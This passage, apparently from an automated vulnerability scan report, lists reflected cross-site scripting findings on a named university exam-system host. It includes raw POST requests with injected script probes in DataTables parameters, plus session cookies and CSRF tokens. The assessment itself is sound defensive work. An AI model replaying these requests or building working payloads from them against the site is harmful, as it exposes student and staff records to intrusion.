User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen'"()%26%25<acx><ScRiPt%20>PFmA(9311)</ScRiPt>&columns[3]
[name]=&columns[3][orderable]=true&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3][searchable]=true&columns[4][data]=jumlah_soal&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=waktu&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=tgl_mulai&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_ujian&columns[7][name]=&columns[7]
[orderable]=false&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Verified vulnerability
Details
URL encoded POST input columns[4][data] was set to jumlah_soal'"()&%<acx><ScRiPt >PFmA(9610)</ScRiPt>
Request headers

23
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1466

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal'"()%26%25<acx><ScRiPt%20>PFmA(9610)</ScRiPt>&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=waktu&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=tgl_mulai&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_ujian&columns[7][name]=&columns[7]
[orderable]=false&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Verified vulnerability
Details
URL encoded POST input columns[5][data] was set to waktu'"()&%<acx><ScRiPt >PFmA(9894)</ScRiPt>
Request headers

24
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1466

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu'"()%26%25<acx><ScRiPt%20>PFmA(9894)</ScRiPt>&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data]=tgl_mulai&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=true&columns[7][data]=id_ujian&columns[7][name]=&columns[7]
[orderable]=false&columns[7][search][regex]=false&columns[7][search][value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/hasilujian/data
Verified vulnerability
Details
URL encoded POST input columns[6][data] was set to tgl_mulai'"()&%<acx><ScRiPt >PFmA(9933)</ScRiPt>
Request headers

25
POST /hasilujian/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1466

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_ujian&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_ujian&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_matkul&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=nama_dosen&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=jumlah_soal&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=waktu&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6]
[data]=tgl_mulai'"()%26%25<acx><ScRiPt%20>PFmA(9933)</ScRiPt>&columns[6]
[name]=&columns[6][orderable]=true&columns[6][search][regex]=false&columns[6][search]
[value]=&columns[6][searchable]=true&columns[7][data]=id_ujian&columns[7]
[name]=&columns[7][orderable]=false&columns[7][search][regex]=false&columns[7][search]
[value]=&columns[7]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/jurusan/add
Details
URL encoded POST input banyak was set to 1<WOC3L5>NH7O7[!+!]</WOC3L5>

The input is reflected inside a text element.

Request headers

26
POST /jurusan/add HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 92

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

banyak=1<WOC3L5>NH7O7[!%2B!]
</WOC3L5>&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&input=
/jurusan/data
Verified vulnerability
Details
URL encoded POST input columns[1][data] was set to nama_jurusan'"()&%<acx><ScRiPt >EPsy(9758)</ScRiPt>
Request headers

27
POST /jurusan/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 676

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_jurusan&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_jurusan'"()%26%25<acx><ScRiPt%20>EPsy(9758)</ScRiPt>&columns[1]
[name]=&columns[1][orderable]=true&columns[1][search][regex]=false&columns[1][search]
[value]=&columns[1][searchable]=true&columns[2][data]=bulk_select&columns[2]
[name]=&columns[2][orderable]=false&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=1&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=&start=0
/kelas/data
Verified vulnerability
Details
URL encoded POST input columns[1][data] was set to nama_kelas'"()&%<acx><ScRiPt >fyTI(9932)</ScRiPt>
Request headers

28
POST /kelas/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 834

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_kelas&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_kelas'"()%26%25<acx><ScRiPt%20>fyTI(9932)</ScRiPt>&columns[1]
[name]=&columns[1][orderable]=true&columns[1][search][regex]=false&columns[1][search]
[value]=&columns[1][searchable]=true&columns[2][data]=nama_jurusan&columns[2]
[name]=&columns[2][orderable]=true&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2][searchable]=true&columns[3][data]=bulk_select&columns[3]
[name]=&columns[3][orderable]=false&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=1&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=&start=0
/kelas/data
Verified vulnerability
Details
URL encoded POST input columns[2][data] was set to nama_jurusan'"()&%<acx><ScRiPt >kxtu(9080)</ScRiPt>
Request headers

29
POST /kelas/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 835

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_kelas&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nama_kelas&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama_jurusan'"()%26%25<acx><ScRiPt%20>kxtu(9080)</ScRiPt>&columns[2]
[name]=&columns[2][orderable]=true&columns[2][search][regex]=false&columns[2][search]
[value]=&columns[2][searchable]=true&columns[3][data]=bulk_select&columns[3]
[name]=&columns[3][orderable]=false&columns[3][search][regex]=false&columns[3][search]
[value]=&columns[3]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/kelasdosen/data
Verified vulnerability
Details
URL encoded POST input columns[1][data] was set to nip'"()&%<acx><ScRiPt >foKa(9120)</ScRiPt>
Request headers

30
POST /kelasdosen/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1134

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id&columns[0][name]=&columns[0][orderable]=false&columns[0][search]
[regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nip'"()%26%25<acx><ScRiPt%20>foKa(9120)</ScRiPt>&columns[1][name]=&columns[1]
[orderable]=true&columns[1][search][regex]=false&columns[1][search][value]=&columns[1]
[searchable]=true&columns[2][data]=nama_dosen&columns[2][name]=&columns[2]
[orderable]=true&columns[2][search][regex]=false&columns[2][search][value]=&columns[2]
[searchable]=true&columns[3][data]=kelas&columns[3][name]=&columns[3]
[orderable]=false&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=false&columns[4][data]=id_dosen&columns[4][name]=&columns[4]
[orderable]=false&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=false&columns[5][data]=id_dosen&columns[5][name]=&columns[5]
[orderable]=false&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=false&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=2&length=10&order
[0][column]=1&order[0][dir]=asc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Verified vulnerability
Details
URL encoded POST input columns[1][data] was set to nim'"()&%<acx><ScRiPt >l0FZ(9771)</ScRiPt>
Request headers

31
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1504

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim'"()%26%25<acx><ScRiPt%20>l0FZ(9771)</ScRiPt>&columns[1][name]=&columns[1]
[orderable]=true&columns[1][search][regex]=false&columns[1][search][value]=&columns[1]
[searchable]=true&columns[2][data]=nama&columns[2][name]=&columns[2]
[orderable]=true&columns[2][search][regex]=false&columns[2][search][value]=&columns[2]
[searchable]=true&columns[3][data]=email&columns[3][name]=&columns[3]
[orderable]=true&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=true&columns[4][data]=nama_kelas&columns[4][name]=&columns[4]
[orderable]=true&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=true&columns[5][data]=nama_jurusan&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data][ada]=ada&columns[6][data]
[id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6][orderable]=true&columns[6]
[search][regex]=false&columns[6][search][value]=&columns[6][searchable]=false&columns[7]
[data]=id_mahasiswa&columns[7][name]=&columns[7][orderable]=true&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Verified vulnerability
Details
URL encoded POST input columns[2][data] was set to nama'"()&%<acx><ScRiPt >l0FZ(9040)</ScRiPt>
Request headers

32
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1504

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama'"()%26%25<acx><ScRiPt%20>l0FZ(9040)</ScRiPt>&columns[2][name]=&columns[2]
[orderable]=true&columns[2][search][regex]=false&columns[2][search][value]=&columns[2]
[searchable]=true&columns[3][data]=email&columns[3][name]=&columns[3]
[orderable]=true&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=true&columns[4][data]=nama_kelas&columns[4][name]=&columns[4]
[orderable]=true&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=true&columns[5][data]=nama_jurusan&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data][ada]=ada&columns[6][data]
[id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6][orderable]=true&columns[6]
[search][regex]=false&columns[6][search][value]=&columns[6][searchable]=false&columns[7]
[data]=id_mahasiswa&columns[7][name]=&columns[7][orderable]=true&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Verified vulnerability
Details
URL encoded POST input columns[3][data] was set to email'"()&%<acx><ScRiPt >l0FZ(9058)</ScRiPt>
Request headers

33
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1504

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email'"()%26%25<acx><ScRiPt%20>l0FZ(9058)</ScRiPt>&columns[3][name]=&columns[3]
[orderable]=true&columns[3][search][regex]=false&columns[3][search][value]=&columns[3]
[searchable]=true&columns[4][data]=nama_kelas&columns[4][name]=&columns[4]
[orderable]=true&columns[4][search][regex]=false&columns[4][search][value]=&columns[4]
[searchable]=true&columns[5][data]=nama_jurusan&columns[5][name]=&columns[5]
[orderable]=true&columns[5][search][regex]=false&columns[5][search][value]=&columns[5]
[searchable]=true&columns[6][data][ada]=ada&columns[6][data]
[id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6][orderable]=true&columns[6]
[search][regex]=false&columns[6][search][value]=&columns[6][searchable]=false&columns[7]
[data]=id_mahasiswa&columns[7][name]=&columns[7][orderable]=true&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Verified vulnerability
Details
URL encoded POST input columns[4][data] was set to nama_kelas'"()&%<acx><ScRiPt >l0FZ(9301)</ScRiPt>
Request headers

34
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1504

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas'"()%26%25<acx><ScRiPt%20>l0FZ(9301)</ScRiPt>&columns[4]
[name]=&columns[4][orderable]=true&columns[4][search][regex]=false&columns[4][search]
[value]=&columns[4][searchable]=true&columns[5][data]=nama_jurusan&columns[5]
[name]=&columns[5][orderable]=true&columns[5][search][regex]=false&columns[5][search]
[value]=&columns[5][searchable]=true&columns[6][data][ada]=ada&columns[6][data]
[id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6][orderable]=true&columns[6]
[search][regex]=false&columns[6][search][value]=&columns[6][searchable]=false&columns[7]
[data]=id_mahasiswa&columns[7][name]=&columns[7][orderable]=true&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Verified vulnerability
Details
URL encoded POST input columns[5][data] was set to nama_jurusan'"()&%<acx><ScRiPt >l0FZ(9280)</ScRiPt>
Request headers

35
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1504

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan'"()%26%25<acx><ScRiPt%20>l0FZ(9280)</ScRiPt>&columns[5]
[name]=&columns[5][orderable]=true&columns[5][search][regex]=false&columns[5][search]
[value]=&columns[5][searchable]=true&columns[6][data][ada]=ada&columns[6][data]
[id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6][orderable]=true&columns[6]
[search][regex]=false&columns[6][search][value]=&columns[6][searchable]=false&columns[7]
[data]=id_mahasiswa&columns[7][name]=&columns[7][orderable]=true&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/mahasiswa/data
Verified vulnerability
Details
URL encoded POST input columns[7][data] was set to id_mahasiswa'"()&%<acx><ScRiPt >l0FZ(9689)</ScRiPt>
Request headers

36
POST /mahasiswa/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Content-Type: application/x-www-form-urlencoded

Content-Length: 1504

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

columns[0][data]=id_mahasiswa&columns[0][name]=&columns[0][orderable]=false&columns[0]
[search][regex]=false&columns[0][search][value]=&columns[0][searchable]=false&columns[1]
[data]=nim&columns[1][name]=&columns[1][orderable]=true&columns[1][search]
[regex]=false&columns[1][search][value]=&columns[1][searchable]=true&columns[2]
[data]=nama&columns[2][name]=&columns[2][orderable]=true&columns[2][search]
[regex]=false&columns[2][search][value]=&columns[2][searchable]=true&columns[3]
[data]=email&columns[3][name]=&columns[3][orderable]=true&columns[3][search]
[regex]=false&columns[3][search][value]=&columns[3][searchable]=true&columns[4]
[data]=nama_kelas&columns[4][name]=&columns[4][orderable]=true&columns[4][search]
[regex]=false&columns[4][search][value]=&columns[4][searchable]=true&columns[5]
[data]=nama_jurusan&columns[5][name]=&columns[5][orderable]=true&columns[5][search]
[regex]=false&columns[5][search][value]=&columns[5][searchable]=true&columns[6][data]
[ada]=ada&columns[6][data][id_mahasiswa]=id_mahasiswa&columns[6][name]=&columns[6]
[orderable]=true&columns[6][search][regex]=false&columns[6][search][value]=&columns[6]
[searchable]=false&columns[7][data]=id_mahasiswa'"()%26%25<acx><ScRiPt%20>l0FZ(9689)
</ScRiPt>&columns[7][name]=&columns[7][orderable]=true&columns[7][search]
[regex]=false&columns[7][search][value]=&columns[7]
[searchable]=true&csrf_test_name=3b88cd89d8fcecd13ee41aa591693f15&draw=6&length=50&order[
0][column]=1&order[0][dir]=desc&search[regex]=false&search[value]=e&start=0
/soal/data
Verified vulnerability
Details
URL encoded POST input columns[2][data] was set to nama_dosen'"()&%<acx><ScRiPt >hRCV(9588)</ScRiPt>
Request headers

37
POST /soal/data HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

